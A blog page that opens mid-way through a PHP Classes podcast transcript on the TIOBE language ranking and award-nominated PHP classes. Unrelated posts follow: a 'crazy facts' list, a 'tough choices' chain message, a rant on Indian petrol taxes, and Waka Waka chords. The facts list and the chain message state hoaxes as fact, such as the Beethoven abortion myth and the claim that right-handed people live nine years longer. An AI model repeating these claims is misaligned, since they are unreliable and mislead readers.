And all this I suppose it influences developers to become interested in Python, but that does not mean that the increase of Python fully justifies a decrease in PHP because just like we think about Google we can also think about Facebook which is a very large site and employs hundreds, I don’t know if you can say thousands, but at least hundreds, it’s fair to say that it’s probably a number of engineers that they have there working with PHP. So I don’t think that could justify any drop.

There may be other reasons that may not be obvious for this ranking to suggest that there is an increase of popularity in Python and Ruby at the expense of decrease in popularity of PHP. And as I mentioned before I do not think that the way they compute these rankings really reflects the real popularity.

And this is just to say that this is not a number that should be taken seriously. One aspect that I noticed is if you go there and you notice that for instance, forgetting all this eventual dispute between scripting language, PHP, Python, Ruby and whatever, if you notice JavaScript which is used by practically all Web developers, it’s nowhere near as popular as any other scripting language.

So something is very wrong in this chart, or at least whatever it suggests or probably the algorithm that they are using. And if we all know that every Web developer knows JavaScript and uses it regardless of what is the main language that they use, so I think there is something very wrong in the way they compute this.

Ernani Joppert: And there is nowhere they published, explained how they find this.
Manuel Lemos: Actually that is there, that is what I was explaining before. They are performing searches for name of the language followed by programming, searched it on Google and then take the first results and evaluate the traffic of the top sites in the Alexa site ranking and then they perform some calculations. This is roughly how I understood it works.

And I’m not sure how people can take this seriously. And if that can be taken seriously how do they justify that JavaScript is not even more popular than I think it should be than any scripting language.

Rochak Chauhan: In my understanding what I think it means people are looking for Python sites more, Python code more. And that basically means that JavaScript and for PHP and they have already bookmarked it, they already have decided the sites.

So in terms of SEO you can say bounce rate is very less. So that means people don’t want to go to look for PHP, they already know.  Like suppose I want to look for PHP code I know PHP Classes there, JavaScript people go to JQuery and Dojo. So they don’t need to search, but in terms of C# and Python people need to look for the repository of forums. That’s what exactly that means in my understanding.

Manuel Lemos: Right, it’s all to say that there is no serious conclusion you can take from this ranking. And for those people that I see commenting they are sort of alarmed that they thought that PHP was no longer as interesting as in the past, I think it’s kind of a silly conclusion.

And another comment that I would like to make is that in my opinion the greatest popularity of PHP comes from its killer applications. And by killer applications I mean applications like WordPress and Drupal, Joomla and many other ready-to-use applications that make PHP very popular.

And they have their own ecosystem and their communities sometimes are quite, I wouldn’t say closed, but I’d say they work pretty much all the time with just themselves. For instance the WordPress community works almost all the time with WordPress. They probably could not care much about general PHP programming outside of the WordPress platform.

So this is something that should give the creators of the TIOBE ranking a lot to think about if they really intend to have their rankings be taken seriously.

And by the way, talking about WordPress, WordPress 3.1 I think, was just released. and by coincidence, or maybe not, it was named… the codename of this release was Django. And when people… I saw comments of people assuming just because the release was named Django it was related to Python.

For those not familiar with Django, Django is a very popular Python framework. And in reality this Django codename was inspired by the author of WordPress, I mean the creator of WordPress, Matt Mullenweg, he’s a big fan of jazz music and there is a jazz musician named Django… I forgot his last name, but that’s where the Django name came from.

And I don’t know if Matt named this release Django on purpose just to make a joke.  Actually I met Matt Mullenweg in 2008. Actually we invited him to come to our free software event here in Brazil. And I met him personally and I know very well that he likes to make jokes. He’s a very nice person and he’s always happy with his life and he likes to make jokes.

So I wouldn’t be surprised if naming this WordPress release Django was to just make fun of whoever could suppose that it could be related with Python, and obviously it doesn’t. It just could be somebody suggesting there is some relation.

And, well, basically that’s all you have to say about this TIOBE ranking, if anybody was concerned that PHP would really be losing popularity in favor of Python and Ruby, personally I don’t believe it, but I’m sure that those languages, Python and Ruby, are increasing their popularity, which is normal for the reasons that we’ve discussed before.

Ernani Joppert: Yeah, just one point, just one point on the subject, there was a very smart comment on the idea that most of the people are familiarized already with PHP, so they have their go-to places.

And by having Ruby and Python interest and there are also new developers coming forward and Ruby is a very, let’s put it this way, academic language because the concepts are object oriented and stuff. So it could be that people are also trying to follow that approach, and with Ruby being very… tends to be used in startups it could be that this is the reason that it’s ranking up.

But the PHP world has a lot of other technologies on top, as Manuel explained, but I guess that your clarification on the TIOBE Ranking, it’s pretty much what I think it is as well. It means that people are searching more for Ruby content or Python content than PHP because PHP has a mature state already, so that’s my thoughts on that.

Manuel Lemos: Right.  But, okay, I’m sure other people will have also their theories and opinions to justify these rankings. And for those that are listening feel free to post your comments to give your opinions about this.

PHP Programming Award nominees of December 2010 (34:22)

But moving on with our podcast now towards the end, we are going to comment about the latest classes that were nominated for the Innovation Award in December 2010, and they were voted in January, and in February the results came out of those that were more voted.

Rochak, in your opinion which classes would you like to comment on that you think are more worth mentioning?

Rochak Chauhan: I think that two of them are the first and the bottom one. The first one was Tic Tac Toe by Amin Saeddi. I really liked how he took up this simple game, used this alpha beta search algorithm. That was the best part. I guess this is one step closer to, like I was saying, PHP moving to AI.

And one of the implementations he can use can demonstrate using the simple game. And you can always use this algorithm to make complex games like Chess, maybe Scrabble, with PHP. That’s again a good start.

The second one I really liked was it has really, really good implementation is twzCronChart. I have myself this issue like when you look into cron chart. It has lots of text but to present that in Gantt visual impact it’s very easy to find out which cron is run. I think this is a very exceptional attempt, very innovative and very exceptional, very useful.

Manuel Lemos: Right.  As you mentioned, this Tic Tac Toe class which is using the alpha beta search algorithm it shows that developers like Amin Saeddi from Iran are demonstrating that there are many developers that have advanced knowledge on advanced topics like artificial intelligence, as you mentioned.

And not only that but it should also be inspiring to other developers also to come up with their own artificial intelligence solutions in PHP because as it just demonstrated that not only it’s possible but it can be useful.

In this case it’s just a simple game of tic tac toe, but it could be something else more serious not just a game, although it doesn’t mean that games cannot be serious. And as you mentioned, the other class twzCronChart just shows a nice effect that you can do with data from crontab files that define basically the schedule of when certain tasks should be executed.

And using a Gantt chart you can get a pretty good idea, a visual representation of when those tasks should happen. And I think it’s quite useful.

But other than that, Ernani, any other classes that you would like to mention?

Ernani Joppert: Oh, yes, I have two picks. One would be the Proxy Connector from Ska-Man in Italy. And basically it’s used to retrieve remote Web pages under the TOR network. And sometimes you have the need for that and it’s very innovative, so I would give him my congratulations.
Manuel Lemos: Probably it would be interesting if you could explain what is the TOR network for those that are not familiar.
Ernani Joppert: Yeah, the TOR network, it’s pretty much a peer to peer network which is encrypted and it’s based on hopping architecture, so you have one entrance, one point of entry and it’s pretty much randomized the way you reach your ended target.

So let’s say if you’re browsing through the Web you are pretty much anonymous because of the amount of hops that you do when you’re requesting a webpage. It pretty much can go ten times around the world and reach the point of entry which is let’s say near your house but you went a long way to get back to the reaching point that you wanted.

So it’s good for anonymity and it’s also good because there are the needs for whistleblowers as Wikileaks have proven. So sometimes you have to extract information and you don’t want to be identified for some reason. And the usage of this class is very clever and it’s very innovative, so that’s why I would give my vote for them.

And the other one would also be the Gantt chart because sometimes a picture is worth more than a thousand words. So it’s very nice to know that Tony from Australia has come up with this idea and proven that visually representing some information is what it needs.

And I guess most PHP Classes users would be using this sooner or later, at least for documentation purposes and to visually represent some batch operations that are run on those servers.

Manuel Lemos: Right.  Well, for me I also like to comment on a couple of classes. One is this Search by Relevance by Carlson Soares from Brazil. What basically it does is to implement a sort of sorting algorithm.

And what it does is basically have a result, have a series of results, and analyzes the keywords that are used in those results and sorts them according to a relevance algorithm. And this could be useful for many purposes of finding what is more relevant in a set of information that could be retrieved for instance from MySQL databases.

And the other class that I would like to comment on just briefly because I’m not an expert but I think it is interesting, is this AllowHTML by Simon Emery from England. And what it does is to filter insecure HTML according to OWASP AntiSamy rules.

For those not familiar, OWASP is an organization that is focused on promoting security, implementation of security norms, rules, practices in general that will help make applications more secure and eventually more immune to abuses and all sorts of security attacks.

And this is basically the two classes that I would like to mention.

The good and the bad of the PHPClasses site according to Rochak Chauhan (42:37)

Manuel Lemos: And now practically ending this podcast just a final section, since we have a guest, Rochak, when we have a guest we usually ask, in your case because you’re a PHP Classes site user, to comment about one good thing and then another bad or not so good thing about PHP Classes site that you think to be worth commenting on.

Rochak Chauhan: Sure. One thing I really like is the indexing, the way you have sorted down in the categories, and sub-categories, it makes life for a developer very, very easy. I really love the indexing, that’s number one.

And one thing I would like you to add, one thing you can improve is have some section where people can post which class, which package they’re looking for, something like a wish list.  So if that is there it will make it very, very effective, more effective.

Manuel Lemos: Actually, that is one thing that is my wish list for many years. And unfortunately I was not able to get it sufficient priority to actually implement it. There are many, many things that could be done to improve the site and I never stop. Once I implement something I move on to the next.

I understand that is an idea that would be interesting because it will also be helpful for developers looking for ideas to implement innovative classes. And one thing will sort of marry with the other and the need for a solution for a problem that was not yet solved and the search of developers that are interested in developing innovative classes to get there.

So, just so you’ll be sort of happy with this I’m sure I will implement it sooner or later, I just don’t know when, but sooner or later I’ll get there as every other thing that people have been asking over the years and I ended up implementing. It just did not come the turn of that idea but it’s actually in my wish list for many years already.

Conclusion (45:22)

Manuel Lemos: OK, I think we have reached the end of our podcast. Rochak, I would like to thank you for your presence and also your participation in PHP Classes site. I hope you can continue to submit more innovative classes.

Rochak Chauhan: I’ll do that.  The pleasure is all mine like I said.
Manuel Lemos: Great.  And I think for me that’s all, Ernani?
Ernani Joppert: Yes, I would like to thank Rochak for participating here, also for contributing and to give his overviews, it was a very clever interview.

And it’s nice to see that we are coming to a global world where it doesn’t matter where you’re from, it just matters your interest level, your intentions to contribute and your intentions to learn.

And this expressed most of our character and that’s what we want to have in the IT world because we want to have people with hungry minds to learn with potential to provide good solutions, creative solutions, and as well have a good community, a community of people everywhere in the world with different cultures.

So I would like to express that and thanks everyone for listening, and I’d like to listen to more feedback from the community here.

Manuel Lemos: That would be great.  Okay, I think that’s all for now, bye.
Rochak Chauhan: Bye, thank you.
Ernani Joppert: Bye, bye.


Categories: Discussion, General News, Others, PHP Code | 20 Comments

Apple Introduces Revolutionary New Laptop With No Keyboard

Categories: Entertainment, Humour | 540 Comments

Some Crazy Facts

  1. If you yelled for 8 years, 7 months and 6 days you would have produced enough sound energy to heat one cup of coffee.  (Hardly seems worth it.)
  2. If you farted consistently for 6 years and 9 months, enough gas is produced to create the energy of an atomic bomb.  (Now that’s more like it!)
  3. The human heart creates enough pressure when it pumps out to the body to squirt blood 30 feet.  (O.M.G.!)
  4. A pig’s orgasm lasts 30 minutes.  (DAMN IT !!!!)
  5. A cockroach will live nine days without its head before it starves to death.  (Creepy…but I’m still not over the pig.)
  6. Banging your head against a wall uses 150 calories an hour. (Don’t try this at home, maybe at work)
  7. The male praying mantis cannot copulate while its head is attached to its body. The female initiates sex by ripping the male’s head off. (Honey, I’m home. What the…?!)
  8. The flea can jump 350 times its body length. It’s like a human jumping the length of a football field. (30 minutes..lucky pig! Can you imagine?)
  9. The catfish has over 27,000 taste buds.  (What could be so tasty on the bottom of a pond?)
  10. Some lions mate over 50 times a day. (I still want to be a pig…quality over quantity)
  11. Butterflies taste with their feet. (Something I always wanted to know.)
  12. The strongest muscle in the body is the tongue.  (Hmmmmmm…. … )
  13. Right-handed people live, on average, nine years longer than left-handed people. (If you’re ambidextrous, do you split the difference?)
  14. Elephants are the only animals that cannot jump.  (Okay, so that would be a good thing)
  15. A cat’s urine glows under a black light. (I wonder who was paid to figure that out?)
  16. An ostrich’s eye is bigger than its brain. (I know some people like that)
  17. Starfish have no brains. (I know some people like that too.)
  18. Polar bears are left-handed. (If they switch, they’ll live a lot longer)
  19. Humans and dolphins are the only species that have sex for pleasure. (What about that pig??)
Categories: Discussion, Entertainment, Humour | 454 Comments

Some tough choices…

Tough Choices

Question 1: If you knew a woman who was pregnant, who had 8 kids already, three who were deaf, two who were blind, one mentally retarded, and she had syphilis, and she was now pregnant again, would you recommend that she have an abortion?

Read the next question before looking at the response for this one.

Question 2: It is time to elect a new world leader, and only your vote counts.

Here are the facts about the three candidates.

Candidate A – Associates with crooked politicians, and consults with astrologers. He has had two mistresses. He also chain smokes and drinks 8 to 10 martinis a day.

Candidate B – He was kicked out of office twice, sleeps until noon, used opium in college and drinks a quart of whiskey every evening.

Candidate C – He is a decorated war hero. He’s a vegetarian, doesn’t smoke, drinks an occasional beer and never cheated on his wife.

Which of these candidates would be your choice?

Decide … and scroll down for the identities of these candidates.

Candidate A was Franklin D. Roosevelt.

Candidate B was Winston Churchill.

Candidate C was Adolf Hitler.

And, by the way, on your answer to the abortion question:

If you said YES …… you just killed Beethoven - the greatest musician of the western world.

The seemingly right and logical choices we make in life are not necessarily the best option always.

Categories: Discussion, Entertainment, General News, Humour | 508 Comments

Ladakh

Categories: Entertainment, General News | 594 Comments

Petrol Prices in India

Petrol Price per liter in our neighbors and other countries

Pakistan = 26Rs

Bangladesh = 22Rs

Cuba = 19Rs

Nepal  = 34Rs

Burma = 30Rs

Afghanistan = 36Rs

Qatar = 30Rs

China = 23 Rs

USA = $2 a gallon = 30 Rs/liter approx.

In all these countries, basic cost of petrol is 15-17 Rs and taxation comes to another 15 Rs or so i.e. price doubles because of tax.

India = 53 Rs


Basic cost of petrol =16.50 Rs

Central tax = 11.80

Central Excise duty 9.75

State tax=8

Vat 4

Total 50.50, now made 53

India is the only country which triples the cost of petrol because of tax.

India collects the majority of central tax and Central excise from oil only

(Actually our cost of oil is even less because ONGC produces 1/3rd of our oil for 20Rs per barrel but sells at 70Rs a barrel to govt, which pockets the royalties.)

HPCL profit 574 Cr

IOC 5556 Cr

BPCL 5015 Cr

Centre collects corporate tax also from these companies.

Why does our Indian govt collect so much tax from a raw material?

Because the finance ministry is lazy and corrupt and finds it difficult to collect from end products – because then those babus will have to actually work.

So much easier to apply a stranglehold on oil companies and extract the money (like a ransom) even before it has been put to productive use in the economy.

Cost to economy because of excessive taxation of oil sector is estimated at 3% of GDP.

The tax collected is anyway wasted in corruption and nepotism

Spread the awareness! Send / Share this link to your friends.

Categories: Discussion, General News | 262 Comments

Waka waka (FIFA 2010 Theme) SHAKIRA

The song is based on four chords (D, A, Bm, G) that keep repeating in the same order.

D
You’re a good soldier
A
Choosing your battles
Bm
Pick yourself up
G
And dust yourself off
And back in the saddle

D
You’re on the frontline
A
Everyone’s watching
Bm
You know it’s serious
G
We’re getting closer
This isn’t over

D
The pressure is on
A
You feel it
Bm
But you’ve got it all
G
Believe it

D
When you fall get up
Oh oh…
A
And if you fall get up
Eh eh…

Bm
Tsamina mina
Zangalewa
G
Cuz this is Africa

D
Tsamina mina eh eh
A
Waka Waka eh eh
Bm
Tsamina mina zangalewa
G
This time for Africa

D
Listen to your god
A
This is our motto
Bm
Your time to shine
G
Don’t wait in line
Y vamos por Todo

D
People are raising
A
Their Expectations
Bm
Go on and feed them
G
This is your moment
No hesitations

D
Today’s your day
A
I feel it
Bm
You paved the way
G
Believe it

D
If you get down
Get up Oh oh…
A
When you get down
Get up eh eh…

Bm
Tsamina mina zangalewa
G
This time for Africa

D
Tsamina mina eh eh
A
Waka Waka eh eh

Bm
Tsamina mina zangalewa
G
Anawa aa

D
Tsamina mina eh eh
A
Waka Waka eh eh
Bm
Tsamina mina zangalewa
G
This time for Africa


Original tabs by: Anne

Categories: Chords and Tabs | 785 Comments